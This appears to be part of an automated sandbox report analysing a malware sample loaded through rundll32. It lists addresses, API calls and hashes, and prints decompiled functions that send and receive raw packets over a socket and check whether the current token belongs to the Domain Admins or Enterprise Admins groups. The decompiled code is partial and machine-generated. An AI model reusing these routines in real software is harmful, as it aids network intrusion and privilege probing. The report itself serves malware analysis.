                                                                                                                                                              0x04e242cb
                                                                                                                                                              0x04e242ce
                                                                                                                                                              0x04e242d1
                                                                                                                                                              0x04e242d6
                                                                                                                                                              0x04e242e0
                                                                                                                                                              0x04e242e0
                                                                                                                                                              0x04e242c9
                                                                                                                                                              0x04e242ef
                                                                                                                                                              0x04e24307
                                                                                                                                                              0x04e2430a
                                                                                                                                                              0x04e2431f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e24325
                                                                                                                                                              0x04e24328
                                                                                                                                                              0x04e24330
                                                                                                                                                              0x04e24333
                                                                                                                                                              0x04e2433d
                                                                                                                                                              0x04e24343
                                                                                                                                                              0x04e24347
                                                                                                                                                              0x04e2434f
                                                                                                                                                              0x04e24351
                                                                                                                                                              0x04e24351
                                                                                                                                                              0x04e24370
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e24376
                                                                                                                                                              0x04e24376
                                                                                                                                                              0x04e2437c
                                                                                                                                                              0x04e2437f
                                                                                                                                                              0x04e24383
                                                                                                                                                              0x04e24390
                                                                                                                                                              0x04e24393
                                                                                                                                                              0x04e24396
                                                                                                                                                              0x04e243a0
                                                                                                                                                              0x04e243ae
                                                                                                                                                              0x04e243bb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e243c1
                                                                                                                                                              0x04e243c3
                                                                                                                                                              0x04e243c9
                                                                                                                                                              0x04e243cf
                                                                                                                                                              0x04e244d1
                                                                                                                                                              0x04e244d2
                                                                                                                                                              0x04e245ef
                                                                                                                                                              0x04e245f5
                                                                                                                                                              0x04e245f8
                                                                                                                                                              0x04e245fa
                                                                                                                                                              0x04e24600
                                                                                                                                                              0x04e24602
                                                                                                                                                              0x04e24602
                                                                                                                                                              0x04e2460a
                                                                                                                                                              0x04e24610
                                                                                                                                                              0x04e24611
                                                                                                                                                              0x04e24612
                                                                                                                                                              0x04e24613
                                                                                                                                                              0x04e24614
                                                                                                                                                              0x04e2461e
                                                                                                                                                              0x04e24621
                                                                                                                                                              0x04e2462e
                                                                                                                                                              0x04e24632
                                                                                                                                                              0x04e24643
                                                                                                                                                              0x04e24662
                                                                                                                                                              0x04e24662
                                                                                                                                                              0x04e24666
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e24666
                                                                                                                                                              0x04e244d8
                                                                                                                                                              0x04e244d9
                                                                                                                                                              0x04e244db
                                                                                                                                                              0x04e245b0
                                                                                                                                                              0x04e245b3
                                                                                                                                                              0x04e245b6
                                                                                                                                                              0x04e245b9
                                                                                                                                                              0x04e245bb
                                                                                                                                                              0x04e245c1
                                                                                                                                                              0x04e245c4
                                                                                                                                                              0x04e245cb
                                                                                                                                                              0x04e245cd
                                                                                                                                                              0x04e245d5
                                                                                                                                                              0x04e245d6
                                                                                                                                                              0x04e245d7
                                                                                                                                                              0x04e245e3
                                                                                                                                                              0x04e245ea
                                                                                                                                                              0x04e245eb
                                                                                                                                                              0x04e244e1
                                                                                                                                                              0x04e244e2
                                                                                                                                                              0x04e244e5
                                                                                                                                                              0x04e2455a
                                                                                                                                                              0x04e2455d
                                                                                                                                                              0x04e24560
                                                                                                                                                              0x04e24562
                                                                                                                                                              0x04e24565
                                                                                                                                                              0x04e24569
                                                                                                                                                              0x04e2456c
                                                                                                                                                              0x04e24572
                                                                                                                                                              0x04e24574
                                                                                                                                                              0x04e24577
                                                                                                                                                              0x04e2457e
                                                                                                                                                              0x04e24584
                                                                                                                                                              0x04e24586
                                                                                                                                                              0x04e2458e
                                                                                                                                                              0x04e2458f
                                                                                                                                                              0x04e24590
                                                                                                                                                              0x04e24599
                                                                                                                                                              0x04e2459a
                                                                                                                                                              0x04e2459b
                                                                                                                                                              0x04e2459c
                                                                                                                                                              0x04e2459d
                                                                                                                                                              0x04e245ac
                                                                                                                                                              0x04e244e7
                                                                                                                                                              0x04e244e7
                                                                                                                                                              0x04e244ea
                                                                                                                                                              0x04e244ed
                                                                                                                                                              0x04e244ef
                                                                                                                                                              0x04e244f2
                                                                                                                                                              0x04e244f6
                                                                                                                                                              0x04e244f9
                                                                                                                                                              0x04e244ff
                                                                                                                                                              0x04e24501
                                                                                                                                                              0x04e24504
                                                                                                                                                              0x04e24508
                                                                                                                                                              0x04e2450b
                                                                                                                                                              0x04e2450e
                                                                                                                                                              0x04e24510
                                                                                                                                                              0x04e24513
                                                                                                                                                              0x04e2451a
                                                                                                                                                              0x04e24520
                                                                                                                                                              0x04e24522
                                                                                                                                                              0x04e2452a
                                                                                                                                                              0x04e2452b
                                                                                                                                                              0x04e2452c
                                                                                                                                                              0x04e24535
                                                                                                                                                              0x04e24536
                                                                                                                                                              0x04e24537
                                                                                                                                                              0x04e24538
                                                                                                                                                              0x04e24541
                                                                                                                                                              0x04e24542
                                                                                                                                                              0x04e24543
                                                                                                                                                              0x04e24544
                                                                                                                                                              0x04e24553
                                                                                                                                                              0x04e24553
                                                                                                                                                              0x04e244e5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e244db
                                                                                                                                                              0x04e243d5
                                                                                                                                                              0x04e243d6
                                                                                                                                                              0x04e244c1
                                                                                                                                                              0x04e244c4
                                                                                                                                                              0x04e244ca
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e244ca
                                                                                                                                                              0x04e243dc
                                                                                                                                                              0x04e243dd
                                                                                                                                                              0x04e2448c
                                                                                                                                                              0x04e2448f
                                                                                                                                                              0x04e24492
                                                                                                                                                              0x04e2449c
                                                                                                                                                              0x04e244a4
                                                                                                                                                              0x04e244a5
                                                                                                                                                              0x04e244a6
                                                                                                                                                              0x04e244b2
                                                                                                                                                              0x04e244b9
                                                                                                                                                              0x04e244ba
                                                                                                                                                              0x04e243e3
                                                                                                                                                              0x04e243e7
                                                                                                                                                              0x04e24445
                                                                                                                                                              0x04e24448
                                                                                                                                                              0x04e2444b
                                                                                                                                                              0x04e24452
                                                                                                                                                              0x04e24455
                                                                                                                                                              0x04e24458
                                                                                                                                                              0x04e2445f
                                                                                                                                                              0x04e24467
                                                                                                                                                              0x04e24468
                                                                                                                                                              0x04e24469
                                                                                                                                                              0x04e24472
                                                                                                                                                              0x04e24473
                                                                                                                                                              0x04e24474
                                                                                                                                                              0x04e24475
                                                                                                                                                              0x04e24476
                                                                                                                                                              0x04e24485
                                                                                                                                                              0x04e243e9
                                                                                                                                                              0x04e243e9
                                                                                                                                                              0x04e243ec
                                                                                                                                                              0x04e243ef
                                                                                                                                                              0x04e243f6
                                                                                                                                                              0x04e243f9
                                                                                                                                                              0x04e243fc
                                                                                                                                                              0x04e24400
                                                                                                                                                              0x04e24403
                                                                                                                                                              0x04e24406
                                                                                                                                                              0x04e2440d
                                                                                                                                                              0x04e24415
                                                                                                                                                              0x04e24416
                                                                                                                                                              0x04e24417
                                                                                                                                                              0x04e24420
                                                                                                                                                              0x04e24421
                                                                                                                                                              0x04e24422
                                                                                                                                                              0x04e24423
                                                                                                                                                              0x04e2442c
                                                                                                                                                              0x04e2442d
                                                                                                                                                              0x04e2442e
                                                                                                                                                              0x04e2442f
                                                                                                                                                              0x04e2443e
                                                                                                                                                              0x04e2443e
                                                                                                                                                              0x04e243e7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e243dd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e242ef

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000100,00000000,?,74654F20), ref: 04E241FD
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E24204
                                                                                                                                                                • Part of subcall function 04E240E3: GetProcessHeap.KERNEL32(00000008,00000027,?,00000000,?,?,?,04E2423D,?,?,?,?,00000000,00000002), ref: 04E240F8
                                                                                                                                                                • Part of subcall function 04E240E3: HeapAlloc.KERNEL32(00000000,?,?,?,04E2423D,?,?,?,?,00000000,00000002), ref: 04E240FB
                                                                                                                                                                • Part of subcall function 04E240E3: GetProcessHeap.KERNEL32(00000008,00000009,?,?,?,04E2423D,?,?,?,?,00000000,00000002), ref: 04E24148
                                                                                                                                                                • Part of subcall function 04E240E3: HeapAlloc.KERNEL32(00000000,?,?,?,04E2423D,?,?,?,?,00000000,00000002), ref: 04E2414B
                                                                                                                                                                • Part of subcall function 04E240E3: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,04E2423D,?,?,?,?,00000000), ref: 04E24184
                                                                                                                                                                • Part of subcall function 04E240E3: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,?,04E2423E,?,?,?,04E2423D,?,?,?,?,00000000), ref: 04E241BC
                                                                                                                                                                • Part of subcall function 04E240E3: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,04E2423D,?,?,?,?), ref: 04E241CB
                                                                                                                                                                • Part of subcall function 04E240E3: HeapFree.KERNEL32(00000000,?,?,?,04E2423D,?,?,?,?,00000000,00000002), ref: 04E241CE
                                                                                                                                                                • Part of subcall function 04E240E3: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04E2423D,?,?,?,?,00000000,00000002), ref: 04E241D7
                                                                                                                                                                • Part of subcall function 04E240E3: HeapFree.KERNEL32(00000000,?,?,?,04E2423D,?,?,?,?,00000000,00000002), ref: 04E241DA
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000100,?,?,?,?,?,00000000,00000002), ref: 04E24287
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E2428E
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000008,?), ref: 04E242D9
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E242E0
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000008,?), ref: 04E24336
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E2433D
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,74654F20,?,00000000,00000100,?), ref: 04E24399
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E243A0
                                                                                                                                                              • memset.MSVCRT ref: 04E243AE
                                                                                                                                                                • Part of subcall function 04E23D0D: rand.MSVCRT ref: 04E23EC3
                                                                                                                                                                • Part of subcall function 04E23D0D: memset.MSVCRT ref: 04E23EFC
                                                                                                                                                                • Part of subcall function 04E23D0D: recv.WS2_32(00000000,00000000,0000FFFF,00000000), ref: 04E23F38
                                                                                                                                                                • Part of subcall function 04E23D0D: htons.WS2_32(?), ref: 04E23F5C
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,00000000,00000002), ref: 04E2466C
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E24673
                                                                                                                                                                • Part of subcall function 04E23D0D: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,74654F20,?,?,?,04E24269,?,00000000,?,?,?,00000000,00000100,?), ref: 04E23D2B
                                                                                                                                                                • Part of subcall function 04E23D0D: HeapAlloc.KERNEL32(00000000,?,?,?,04E24269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04E23D34
                                                                                                                                                                • Part of subcall function 04E23D0D: GetProcessHeap.KERNEL32(00000008,00000027,00000000,?,?,?,04E24269,?,00000000,?,?,?,00000000,00000100,?,?), ref: 04E23D46
                                                                                                                                                                • Part of subcall function 04E23D0D: HeapAlloc.KERNEL32(00000000,?,?,?,04E24269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04E23D49
                                                                                                                                                                • Part of subcall function 04E23D0D: GetProcessHeap.KERNEL32(00000008,0000003D,?,?,?,04E24269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04E23D63
                                                                                                                                                                • Part of subcall function 04E23D0D: HeapAlloc.KERNEL32(00000000,?,?,?,04E24269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04E23D66
                                                                                                                                                                • Part of subcall function 04E23D0D: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,04E24269,?,00000000,?,?,?), ref: 04E23E5B
                                                                                                                                                                • Part of subcall function 04E23D0D: GetProcessHeap.KERNEL32(00000008,00000029,?,?,?,04E24269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04E23E65
                                                                                                                                                                • Part of subcall function 04E23D0D: HeapAlloc.KERNEL32(00000000,?,?,?,04E24269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04E23E68
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$AllocFree$Sleep$memset$htonsrandrecv
                                                                                                                                                              • String ID: Oet Uet0Xet
                                                                                                                                                              • API String ID: 2891003447-3175316637
                                                                                                                                                              • Opcode ID: cd06440cad69c0097993bb5ed52b05b099e372acd614fc33452c17b6d6ec11c7
                                                                                                                                                              • Instruction ID: 4baaeca4816bd780867d0d053b481d4af571eea2c76f6a24692b6ab2ec45f760
                                                                                                                                                              • Opcode Fuzzy Hash: cd06440cad69c0097993bb5ed52b05b099e372acd614fc33452c17b6d6ec11c7
                                                                                                                                                              • Instruction Fuzzy Hash: DCF1DFB2904715AFDB11CF44C944EAABBB2FF49305F08885DE945AB391C3B6FA15CB90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                              			E04E22E12(intOrPtr _a4, signed int _a8, short _a12) {
                                                                                                                                                              				char _v5;
                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				void* _t43;
                                                                                                                                                              				void* _t49;
                                                                                                                                                              				short _t52;
                                                                                                                                                              				short _t53;
                                                                                                                                                              				short _t54;
                                                                                                                                                              				short _t55;
                                                                                                                                                              				short _t60;
                                                                                                                                                              				void* _t65;
                                                                                                                                                              				signed int _t67;
                                                                                                                                                              				void* _t75;
                                                                                                                                                              				signed int _t78;
                                                                                                                                                              
                                                                                                                                                              				_v5 = 0;
                                                                                                                                                              				_v12 = 0xbadf00d;
                                                                                                                                                              				_t43 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                              				_v16 = _t43;
                                                                                                                                                              				if(_t43 == 0) {
                                                                                                                                                              					L14:
                                                                                                                                                              					return _v5;
                                                                                                                                                              				}
                                                                                                                                                              				_t65 = HeapAlloc(GetProcessHeap(), 8, 0x48);
                                                                                                                                                              				if(_t65 == 0) {
                                                                                                                                                              					L13:
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _v16);
                                                                                                                                                              					goto L14;
                                                                                                                                                              				}
                                                                                                                                                              				_t67 = 9;
                                                                                                                                                              				_t49 = memcpy(_t65, _a8, _t67 << 2);
                                                                                                                                                              				__imp__#9(0x44);
                                                                                                                                                              				 *(_t65 + 0x31) =  *(_t65 + 0x31) | 0xffffffff;
                                                                                                                                                              				 *(_t65 + 2) = _t49;
                                                                                                                                                              				_t78 = _a8;
                                                                                                                                                              				 *((short*)(_t65 + 0x25)) = 0xfc;
                                                                                                                                                              				 *((short*)(_t65 + 0x27)) = 0xec0;
                                                                                                                                                              				_t52 = 0x40;
                                                                                                                                                              				 *((short*)(_t65 + 0x29)) = _t52;
                                                                                                                                                              				_t53 = 4;
                                                                                                                                                              				 *((short*)(_t65 + 0x37)) = _t53;
                                                                                                                                                              				_t54 = 0x40;
                                                                                                                                                              				 *((short*)(_t65 + 0x39)) = _t54;
                                                                                                                                                              				_t55 = 5;
                                                                                                                                                              				 *((short*)(_t65 + 0x41)) = _t55;
                                                                                                                                                              				 *((char*)(_t65 + 8)) = 0x25;
                                                                                                                                                              				 *((char*)(_t65 + 0x24)) = 0xe;
                                                                                                                                                              				 *((short*)(_t65 + 0x44)) = _a12;
                                                                                                                                                              				_a8 = _a8 & 0x00000000;
                                                                                                                                                              				 *(_t78 + 0x22) = ( *(_t78 + 0x22) & 0x0000ff00) - 0x100;
                                                                                                                                                              				L3:
                                                                                                                                                              				L3:
                                                                                                                                                              				if(_a8 != 8) {
                                                                                                                                                              					 *(_t78 + 0x22) =  *(_t78 + 0x22) + 1;
                                                                                                                                                              					_t60 =  *(_t78 + 0x22);
                                                                                                                                                              				} else {
                                                                                                                                                              					_t60 = _a12;
                                                                                                                                                              				}
                                                                                                                                                              				 *((short*)(_t65 + 0x22)) = _t60;
                                                                                                                                                              				__imp__#19(_a4, _t65, 0x48, 0);
                                                                                                                                                              				if(_t60 > 0) {
                                                                                                                                                              					_t75 = _v16;
                                                                                                                                                              					__imp__#16(_a4, _t75, 0xffff, 0);
                                                                                                                                                              					if(_t60 > 0) {
                                                                                                                                                              						_v12 =  *((intOrPtr*)(_t75 + 9));
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				if(_v12 != 0) {
                                                                                                                                                              					goto L12;
                                                                                                                                                              				}
                                                                                                                                                              				_a8 = _a8 + 1;
                                                                                                                                                              				if(_a8 < 0xc) {
                                                                                                                                                              					goto L3;
                                                                                                                                                              				}
                                                                                                                                                              				_v5 = 1;
                                                                                                                                                              				L12:
                                                                                                                                                              				HeapFree(GetProcessHeap(), 8, _t65);
                                                                                                                                                              				goto L13;
                                                                                                                                                              			}

















                                                                                                                                                              0x04e22e27
                                                                                                                                                              0x04e22e2b
                                                                                                                                                              0x04e22e3b
                                                                                                                                                              0x04e22e3d
                                                                                                                                                              0x04e22e42
                                                                                                                                                              0x04e22f51
                                                                                                                                                              0x04e22f57
                                                                                                                                                              0x04e22f57
                                                                                                                                                              0x04e22e52
                                                                                                                                                              0x04e22e56
                                                                                                                                                              0x04e22f3e
                                                                                                                                                              0x04e22f4a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e22f50
                                                                                                                                                              0x04e22e61
                                                                                                                                                              0x04e22e66
                                                                                                                                                              0x04e22e68
                                                                                                                                                              0x04e22e6e
                                                                                                                                                              0x04e22e72
                                                                                                                                                              0x04e22e76
                                                                                                                                                              0x04e22e80
                                                                                                                                                              0x04e22e89
                                                                                                                                                              0x04e22e8d
                                                                                                                                                              0x04e22e8e
                                                                                                                                                              0x04e22e94
                                                                                                                                                              0x04e22e95
                                                                                                                                                              0x04e22e9b
                                                                                                                                                              0x04e22e9c
                                                                                                                                                              0x04e22ea2
                                                                                                                                                              0x04e22ea3
                                                                                                                                                              0x04e22eab
                                                                                                                                                              0x04e22eaf
                                                                                                                                                              0x04e22eb3
                                                                                                                                                              0x04e22ecb
                                                                                                                                                              0x04e22ecf
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e22ed3
                                                                                                                                                              0x04e22ed7
                                                                                                                                                              0x04e22edf
                                                                                                                                                              0x04e22ee3
                                                                                                                                                              0x04e22ed9
                                                                                                                                                              0x04e22ed9
                                                                                                                                                              0x04e22ed9
                                                                                                                                                              0x04e22eef
                                                                                                                                                              0x04e22ef3
                                                                                                                                                              0x04e22efb
                                                                                                                                                              0x04e22efd
                                                                                                                                                              0x04e22f0b
                                                                                                                                                              0x04e22f13
                                                                                                                                                              0x04e22f18
                                                                                                                                                              0x04e22f18
                                                                                                                                                              0x04e22f13
                                                                                                                                                              0x04e22f1f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e22f21
                                                                                                                                                              0x04e22f28
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e22f2a
                                                                                                                                                              0x04e22f2e
                                                                                                                                                              0x04e22f38
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?), ref: 04E22E32
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E22E3B
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000048,74654F20), ref: 04E22E4D
                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 04E22E50
                                                                                                                                                              • htons.WS2_32(00000044), ref: 04E22E68
                                                                                                                                                              • send.WS2_32(0BADF00D,00000000,00000048,00000000), ref: 04E22EF3
                                                                                                                                                              • recv.WS2_32(0BADF00D,00000008,0000FFFF,00000000), ref: 04E22F0B
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04E22F31
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E22F38
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04E22F43
                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 04E22F4A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$Process$AllocFree$htonsrecvsend
                                                                                                                                                              • String ID: Oet Uet0Xet
                                                                                                                                                              • API String ID: 1780562090-3175316637
                                                                                                                                                              • Opcode ID: af87054b57c70cc0a2d9124871f24b3ffee496358fa4382a316eb28d6f27deed
                                                                                                                                                              • Instruction ID: fbe20df1a5860d4be3a35fcb65582bfd70b3b48afc4aa5b6cb18150c83bb2c94
                                                                                                                                                              • Opcode Fuzzy Hash: af87054b57c70cc0a2d9124871f24b3ffee496358fa4382a316eb28d6f27deed
                                                                                                                                                              • Instruction Fuzzy Hash: F841E335540345AAEB209FA5CD45BAA3BB4FF48311F109499FB08AF284E779D844CB18
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E2892A() {
                                                                                                                                                              				long _v8;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				char* _t31;
                                                                                                                                                              				DWORD* _t32;
                                                                                                                                                              				long _t33;
                                                                                                                                                              				void* _t37;
                                                                                                                                                              				void* _t39;
                                                                                                                                                              				void** _t43;
                                                                                                                                                              
                                                                                                                                                              				_v16 = 0;
                                                                                                                                                              				_v12 = 0;
                                                                                                                                                              				if(OpenThreadToken(GetCurrentThread(), 0x20008, 1,  &_v12) == 0) {
                                                                                                                                                              					GetLastError();
                                                                                                                                                              					L23:
                                                                                                                                                              					return _v16;
                                                                                                                                                              				}
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				if(GetTokenInformation(_v12, 2, 0, 0,  &_v8) != 0) {
                                                                                                                                                              					L21:
                                                                                                                                                              					CloseHandle(_v12);
                                                                                                                                                              					goto L23;
                                                                                                                                                              				}
                                                                                                                                                              				if(GetLastError() != 0x7a) {
                                                                                                                                                              					L20:
                                                                                                                                                              					goto L21;
                                                                                                                                                              				}
                                                                                                                                                              				_t39 = GlobalAlloc(0x40, _v8);
                                                                                                                                                              				if(_t39 == 0) {
                                                                                                                                                              					GetLastError();
                                                                                                                                                              					L19:
                                                                                                                                                              					goto L20;
                                                                                                                                                              				}
                                                                                                                                                              				if(GetTokenInformation(_v12, 2, _t39, _v8,  &_v8) == 0) {
                                                                                                                                                              					GetLastError();
                                                                                                                                                              					L17:
                                                                                                                                                              					GlobalFree(_t39);
                                                                                                                                                              					goto L19;
                                                                                                                                                              				}
                                                                                                                                                              				_t37 = 0;
                                                                                                                                                              				if( *_t39 > 0) {
                                                                                                                                                              					_t11 = _t39 + 4; // 0x4
                                                                                                                                                              					_t43 = _t11;
                                                                                                                                                              					while(_v16 == 0) {
                                                                                                                                                              						_t31 = GetSidSubAuthorityCount( *_t43);
                                                                                                                                                              						if(_t31 != 0 &&  *_t31 >= 4) {
                                                                                                                                                              							_t32 = GetSidSubAuthority( *_t43, 4);
                                                                                                                                                              							if(_t32 != 0) {
                                                                                                                                                              								_t33 =  *_t32;
                                                                                                                                                              								if(_t33 == 0x200 || _t33 == 0x207) {
                                                                                                                                                              									_v16 = 1;
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              						_t37 = _t37 + 1;
                                                                                                                                                              						_t43 =  &(_t43[2]);
                                                                                                                                                              						if(_t37 <  *_t39) {
                                                                                                                                                              							continue;
                                                                                                                                                              						} else {
                                                                                                                                                              							goto L17;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              			}












                                                                                                                                                              0x04e2893e
                                                                                                                                                              0x04e28941
                                                                                                                                                              0x04e28953
                                                                                                                                                              0x04e28a17
                                                                                                                                                              0x04e28a1d
                                                                                                                                                              0x04e28a22
                                                                                                                                                              0x04e28a22
                                                                                                                                                              0x04e28964
                                                                                                                                                              0x04e28971
                                                                                                                                                              0x04e28a0c
                                                                                                                                                              0x04e28a0f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e28a0f
                                                                                                                                                              0x04e28983
                                                                                                                                                              0x04e28a0b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e28a0b
                                                                                                                                                              0x04e28995
                                                                                                                                                              0x04e28999
                                                                                                                                                              0x04e28a08
                                                                                                                                                              0x04e28a0a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e28a0a
                                                                                                                                                              0x04e289ac
                                                                                                                                                              0x04e289fd
                                                                                                                                                              0x04e289ff
                                                                                                                                                              0x04e28a00
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e28a00
                                                                                                                                                              0x04e289ae
                                                                                                                                                              0x04e289b2
                                                                                                                                                              0x04e289b4
                                                                                                                                                              0x04e289b4
                                                                                                                                                              0x04e289b7
                                                                                                                                                              0x04e289bf
                                                                                                                                                              0x04e289c7
                                                                                                                                                              0x04e289d2
                                                                                                                                                              0x04e289da
                                                                                                                                                              0x04e289dc
                                                                                                                                                              0x04e289e3
                                                                                                                                                              0x04e289ec
                                                                                                                                                              0x04e289ec
                                                                                                                                                              0x04e289e3
                                                                                                                                                              0x04e289da
                                                                                                                                                              0x04e289f3
                                                                                                                                                              0x04e289f4
                                                                                                                                                              0x04e289f9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e289fb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e289fb
                                                                                                                                                              0x04e289f9
                                                                                                                                                              0x04e289b7

                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 04E28944
                                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000), ref: 04E2894B
                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 04E2896D
                                                                                                                                                              • GetLastError.KERNEL32 ref: 04E2897E
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 04E2898F
                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 04E289A8
                                                                                                                                                              • GetSidSubAuthorityCount.ADVAPI32(00000004), ref: 04E289BF
                                                                                                                                                              • GetSidSubAuthority.ADVAPI32(00000004,00000004), ref: 04E289D2
                                                                                                                                                              • GetLastError.KERNEL32 ref: 04E289FD
                                                                                                                                                              • GlobalFree.KERNEL32 ref: 04E28A00
                                                                                                                                                              • GetLastError.KERNEL32 ref: 04E28A08
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 04E28A0F
                                                                                                                                                              • GetLastError.KERNEL32 ref: 04E28A17
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$Token$AuthorityGlobalInformationThread$AllocCloseCountCurrentFreeHandleOpen
                                                                                                                                                              • String ID:
